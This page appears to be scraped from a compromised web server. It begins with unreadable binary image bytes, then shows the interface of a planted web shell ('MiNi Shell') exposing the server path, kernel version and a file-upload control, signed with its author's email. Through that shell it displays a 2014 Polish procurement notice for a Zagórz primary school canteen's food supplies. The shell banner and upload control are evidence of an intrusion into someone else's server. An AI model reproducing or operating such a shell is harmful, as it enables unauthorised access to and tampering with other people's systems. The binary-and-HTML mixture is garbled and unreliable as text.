JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141204/398240-N-2014.html

<p class="kh_header"><b>Zagórz: Dostawa artykułów spożywczych  dla potrzeb stołówki szkolnej w Szkole Podstawowej w Zagórzu</b><br>
<b>Numer ogłoszenia: 398240 - 2014; data zamieszczenia: 04.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa w Zagórzu , ul. Piłsudskiego 70, 38-540 Zagórz, woj. podkarpackie, tel. 13 4653901, 4653900, faks 13 4622022.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych  dla potrzeb stołówki szkolnej w Szkole Podstawowej w Zagórzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Artykuły spożywcze.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.10.00.00-9, 15.81.00.00-9, 15.50.00.00-3, 15.11.21.00-7, 15.89.43.00-4, 15.30.00.00-1, 15.33.11.70-9, 15.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Według Specyfikacji Istotnych Warunków Zamówienia  SWIZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Według Specyfikacji Istotnych Warunków Zamówienia  SWIZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Według Specyfikacji Istotnych Warunków Zamówienia  SWIZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Według Specyfikacji Istotnych Warunków Zamówienia  SWIZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Według Specyfikacji Istotnych Warunków Zamówienia  SWIZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Według Specyfikacji Istotnych Warunków Zamówienia  SWIZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa  w Zagórzu -   budynek przy ul. Wolności 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2014 godzina 08:00, miejsce: Szkoła Podstawowa  w Zagórzu  -  budynek przy ul. Wolności 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Barszcz biały	szt	1200
2	Batonikczekoladowynadziew.50%czekolady mlecznej  szt.          	1200
3	Bazylia 10g	szt.	18
4	Croisanty francuskie	szt	180
5	Cukier kryształ	kg	12
6	Cukier puder	kg	60
7	Cukier waniliowy 16g	szt	30
8	Cukierki w czekoladzie	kg	12
9	Cynamon 20g	szt.	1200
10	Czekolada 100g 80% kakao	szt.	1200
11	Czekolada 100g 80% kakao nadziew.	szt.	60
12	Ćwikła z chrzanem 0,9 l	szt.	60
13	Drożdżówki nadziewane	szt.	30
14	Dżem truskawkowy	szt	30
15	Dżem wisniowy	szt	216
16	Groszek konserwowy 400g	szt.	30
17	Jarzynka w proszku 1kg	szt	12
18	Kasza jęczmienna	kg	18
19	Kasza jęczmienna saszetki 4x100g	szt	24
20	Ketchup 450ml	szt	18
21	Kminek 20g	szt	30
22	Koncentrat buraczany 300ml	szt.	18
23	Kukurydza konserwowa  400g	szt.	18
24	Kwasek cytrynowy 20g	szt	6
25	Liść laurowy 15g 	szt.	30
26	Maga /przyprawa do zup/1040ml	szt	36
27	Majeranek 250g	kg	24
28	Majonez rzymski 260g	szt.	144
29	Makaron łazanka 100% durum	kg	144
30	Makaron muszelka100%durum	kg	12
31	Makaron nitka z pszenicy100%durum	kg	144
32	Makaron spaghetti 100%durum	kg	144
33	Makaron świderki 100% durum	kg	120
34	Makaron wstążka karbow.100%durum	kg	60
35	Makaron zacierka 100% durum	kg	6
36	Margaryna palma 250g	szt	6
37	Mąka pszenna typ 500	kg	60
38	Musztarda 1000ml	litry	24
39	Ocet	litry	30
40	Olej palmowy	litr	18
41	Olej rzepakowyzpierwszegotłoczenia1l	litr	60
42	Olejrzepakowyzpierwszegotłoczenia3l	litr	18
43	Oliwa z oliwek	litry	18
44	Oregano 10g	szt.	18
45	Papryka slodka 20 g	szt.	42
46	Pączki nadziewane	szt	24
47	Pieczarki marynowane 0,9l	szt.	18
48	Pieprz mielony 15 g	szt.	18
49	Precel półfrancuski	szt	30
50	Proszek do pieczenia 16g	szt.	150
51	Przecier pomidorowy 30%- 0,9 l	szt	108
52	Przyprawa do miesa 	szt.	120
53	Przyprawa do potraw chińskich	szt.	18
54	Rogal z czekoladą	szt	30
55	Rosół drobiowy  1kg	szt.	18
56	Rożek półfrancuski	szt	1200
57	Ryż 	kg	1200
58	Ryż saszetki 4x100g	szt	1200
59	Smalec 200g	szt	1200
60	Soczki owocowe 200ml.kartonik	szt.	30
61	Soczki przecierowe 300ml.butel. plastik	szt.	30
62	Sok owocowy 0,5l	szt	12
63	Sos boloński 1kg	szt.	120
64	Sos czekoladowy  1 kg	szt	24
65	Sos pieczeniowy 	szt	3600
66	Sos pomidorowy 1kg	szt	3600
67	Sos z owoców leśnych 1 kg	szt	180
68	Sól	kg	1260
69	Wafelek kakaowy	szt	1260
70	Wafelek mleczny	szt	1260
71	Wafelek nadziewany	szt.	1260
72	Wafelek w czekoladzie 	szt	1260
73	Zakwas do żurku  0,5l	szt	1260
74	Ziarenka smaku 120 g	szt	60
75	Papirus do smażenia z przyprawami	szt	1260
76	Czekolada z orzechami 100g	szt	60
77	Makaron pióra 100% durum	kg	60
78	Makaron kokardka 100% durum	kg	60
79	Makaron kolanko100% durum	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty zwierzęce, mięso i podroby mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Boczek wędzony	kg	12
2.	Karkówka wieprzowa	kg	360
3.	Kaszanka	kg	90
4.	Kiełbasa zwyczajna	kg	48
5.	Kości od schabu	kg	90
6.	Lencz w bloku	kg	18
7.	Łopatka bez kości	kg	480
8.	Parówka cienka	kg	150
9.	Rostbef wołowy	kg	12
10.	Schab bez kości	kg	360
11.	Szponder wołowy	kg	180
  12.	Szynka wieprzowa surowa    kg   	kg	360.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo świeże, wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bułka tarta	kg	90
2.	Bułka  zwykła	szt.	1200
3.	Bułeczki pod pierzynką	szt.	1200
4.	Chleb zwykły krojony 0,6 kg	szt.	120
5.	Drożdzówki	szt.	1200
6.	Croissanty francuskie	szt.	1200
7.	Paluch z serem	szt.	1200
8.	Pączki	szt.	1200
9.	Precel półfrancuski	szt.	1200
10.	Rogal z czekoladą	szt.	1200
11.	Rogal z marmoladą	szt.	1200
12.	Rożek półfrancuski	szt.	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Batonik mleczna kanapka	szt.	1200
2.	Jogurt kremowy 150g	szt.	1200
3.	Jogurt owocowy 150 g-1,5%tł.	szt.	1200
4.	Jogurt pitny 250 ml	szt.	1200
5.	Jogurt pitny 180 ml	szt.	1200
6.	Masło extra 200g,82,5%	kg	150
7.	Mleko 3,2%	L	216
8.	Ser żółty twardy 40 %tł. 	kg	24
9.	Śmietana kubek 400g,18%	szt.	450
10.	Twaróg półtłusty krajanka	kg	120
11.	Serek homogenizowany	szt.	1260.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> świeży drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z kurczaka	kg	240
2	Kości kulinarne świeże drobiowe	kg	60
3	Kurczak cały/świeży/	kg	12
4	Skrzydełka z kurczaka	kg	30
5	Udko z kurczaka/pałeczki/	kg	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dania gotowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Gołąbki świeże ręcznie robione 	kg	390
	z ryżem i mięsem		
2.	Gołąbki świeże ręcznie robione z  ryżem	kg	240
3.	Kluski śląskie świeże ręcznie robione	kg	240
4.	Kopytka świeże recznie robione	kg	300
5.	Krokiety świeże ręcznie robione 	kg	240
	z kapustą i mięsem		
6.	Krokiety świeże ręcznie robione z kapustą	kg	150
7.	Naleśniki z serem	kg	270
8.	Pierogi ruskie świeże ręcznie robione	kg	240
9.	Placki naleśnikowe	szt	1260
10.	Pyzy z mięsem świeże ręcznie robione	kg	210
11.	Uszka z mięsem świeże ręcznie robione	kg	270.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.43.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Owoce warzywa i produkty podobne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Banan	kg	300
2.	Brzoskwinia	kg	270
3.	Burak ćwikłowy	kg	90
4.	Cebula	kg	60
5.	Czosnek polski	kg	6
6.	Ćwikła z chrzanem 0,77 G	szt.	90
7.	Fasola Piękny Jaś	kg	30
8.	Groch łuskany	kg	18
9.	Gruszka 	kg	540
10.	Jabłka	kg	60
11.	Jaja /L/	szt.	3000
12.	Kalafior świeży	szt.	18
13.	Kapusta biała główka	szt.	72
14.	Kapusta czerwona	szt.	60
15.	Kapusta kiszona	kg	240
16.	Kapusta pekińska	kg	120
17.	Koper susz 20 g	szt.	18
18	Kiwi	kg	240
19	Mandarynka	kg	240
20	Marchew	kg	240
21	Natka pietruszki susz 20g	szt.	30
22	Nektarynki	kg	240
23	Ogórek kiszony 	kg	72
24	Ogórek konserwowy słoik 0,9 l	szt.	120
25	Ogórek świeży	kg	120
26	Papryka świeża	kg	12
27	Pieczarki	kg	60
28	Pieczarki marynowane 0,9l	szt.	18
29	Pomarańcza	kg	300
30	Pietruszka korzeń	kg	90
31	Pomidor  świeży	kg	30
32	Por	szt.	12
33	Sałata lodowa	szt.	240
34	Sałata zielona	szt.	240
35	Seler korzeń	kg	150
36	Soczki owocowe200ml/kartonik/	szt.	1200
37	Soczki przecierowe300ml/butelka plastik/	szt.	1200
38	Śliwka	kg	240
39	Przecier pomidorowy 30%-0,9l	szt.	42
40	Koper zielony-świeży	szt.	60
41	Natka pietruszki-świeża	szt.	60
42	Ziemniaki	kg	2220
43	Kapusta kiszona sałatkowa /L/	kg	240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Warzywa mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Brokuły mrożone	kg	48
2.	Fasolka szparagowa mrożona	kg	180
3.	Groszek zielony mrożony	kg	30
   4.	Kalafior mrożony	kg	48
   5.	Zupa jarzynowa/mieszanka 7 skład.	kg	60
   6.	Marchewka z groszkiem	kg	90
   7.	Truskawka mrożona	kg	120
   8.	Marchewka mała mrożona/mini/	kg	180
   9.	Warzywa na patelnię mrożone	kg	48.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Ryby przetworzone i konserwowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filet zapiekany z serem	kg	120
2.	Filety panierowane EXCELLENT	kg	120
3.	Paluszki panierowane z fileta	kg	120
4.	Kostka rybna panierow. z fileta nie mielona	kg	120
5.	Kotlety  rybne /burgery rybne/	kg	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com